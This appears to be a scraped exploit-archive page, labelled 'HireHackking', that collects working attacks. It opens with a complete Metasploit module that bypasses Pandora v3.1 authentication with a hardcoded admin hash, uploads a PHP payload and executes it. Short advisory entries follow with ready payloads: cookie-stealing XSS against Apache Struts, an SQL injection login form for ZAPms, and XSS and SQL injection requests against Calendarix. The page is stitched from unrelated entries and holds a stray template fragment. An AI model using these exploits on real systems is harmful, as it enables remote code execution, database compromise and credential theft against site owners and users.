## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability", 'Description' => %q{ This module exploits an authentication bypass vulnerability in Pandora v3.1 as disclosed by Juan Galiana Lara. It also integrates with the built-in pandora upload which allows a user to upload arbitrary files to the '/images/' directory. This module was created as an exercise in the Metasploit Mastery Class at Blackhat that was facilitated by egypt and mubix. }, 'License' => MSF_LICENSE, 'Author' => [ 'Juan Galiana Lara', # Vulnerability discovery 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module 'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module '_flood <freshbones[at]gmail.com>', # Metasploit module 'mubix <mubix[at]room362.com>', # Auth bypass and file upload 'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload ], 'References' => [ ['CVE', '2010-4279'], ['OSVDB', '69549'], ['BID', '45112'] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ ['Automatic Targeting', { 'auto' => true }] ], 'Privileged' => false, 'DisclosureDate' => "Nov 30 2010", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']), ], self.class) end def check base = target_uri.path # retrieve software version from login page begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, 'index.php') }) if res and res.code == 200 #Tested on v3.1 Build PC100609 and PC100608 if res.body.include?("v3.1 Build PC10060") return Exploit::CheckCode::Appears elsif res.body.include?("Pandora") return Exploit::CheckCode::Detected end end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionError vprint_error("#{peer} - Connection failed") end return Exploit::CheckCode::Unknown end # upload a payload using the pandora built-in file upload def upload(base, file, cookies) data = Rex::MIME::Message.new data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"") data.add_part("Go", nil, nil, 'form-data; name="go"') data.add_part("images", nil, nil, 'form-data; name="directory"') data.add_part("1", nil, nil, 'form-data; name="upload_file"') data_post = data.to_s data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(base, 'index.php'), 'cookie' => cookies, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'vars_get' => { 'sec' => 'gsetup', 'sec2' => 'godmode/setup/file_manager', }, 'data' => data_post }) register_files_for_cleanup(@fname) return res end def exploit base = target_uri.path @fname = "#{rand_text_numeric(7)}.php" cookies = "" # bypass authentication and get session cookie res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, 'index.php'), 'vars_get' => { 'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3', 'loginhash_user' => 'admin', 'loginhash' => '1', }, }) # fix if logic if res and res.code == 200 if res.body.include?("Logout") cookies = res.get_cookies print_status("Login Bypass Successful") print_status("cookie monster = " + cookies) else fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed") end end # upload PHP payload to images/[fname] print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php, cookies) rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed") end if res and res.code == 200 print_good("#{peer} - File uploaded successfully") else fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end # retrieve and execute PHP payload print_status("#{peer} - Executing payload (images/#{@fname})") begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, 'images', "#{@fname}") }, 1) rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed") end end end
HireHackking
source: https://www.securityfocus.com/bid/47784/info Apache Struts is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. Successful exploitation requires 'Dynamic Method Invocation' to be enabled by default. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Apache Struts versions 2.0.0 through 2.2.1.1 are vulnerable. http://www.example.com/struts2-blank/home.action!login:cantLogin<script>alert(document.cookie)</script>=some_value
HireHackking

ZAPms 1.22 - 'nick' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47782/info ZAPms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ZAPms 1.22 is vulnerable; other versions may also be affected. The following example request is available: <form action="http://www.example.com/[path]/?sid=1" method="post" id="Login" > <input name="nick" type="text" id="nick" value="'SQL+CODE+HERE" /> <input name="pwd" id="pwd" type="password" value="adminpwd" /> <input name="submit" type="submit" class="submit_login" value="Login" /> </form>
HireHackking
source: https://www.securityfocus.com/bid/47790/info Calendarix is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Calendarix 0.8.20080808 is vulnerable; other versions may also be affected. <form action="http://www.example.com/cal_login.php?op=login" method="post" name="main" /> <input type="hidden" name="login" value="&#039;SQL_CODE_HERE"/> <input type="hidden" name="password" value=""/> <input type="submit" value="submit"/> </form> http://www.example.com/cal_login.php/%27%3E%3Cscript%3Ealert%28123%29;%3C/script%3E <form action="http://www.example.com/cal_catview.php?catop=viewcat" method="post" name="main" /> <input type="hidden" name="gocat" value="&#039;</script><script>alert(document.cookie);</script>"/> <input type="submit" value="submit"/> </form> http://www.example.com/cal_date.php?frmname=%3C/script%3E%3Cscript%3Ealert%28123%29;%3C/script%3E http://www.example.com/cal_footer.inc.php?leftfooter=%3Cscript%3Ealert%28123%29;%3C/script%3E
HireHackking
source: https://www.securityfocus.com/bid/47834/info The Microsoft .NET Framework is prone to a remote code-execution vulnerability that affects the Just-In-Time (JIT) compiler optimization on x86 architectures. Successful exploits may allow an attacker to execute arbitrary code in the context of the browser; this may aid in further attacks. if ((value == null || value == new string[0]) == false)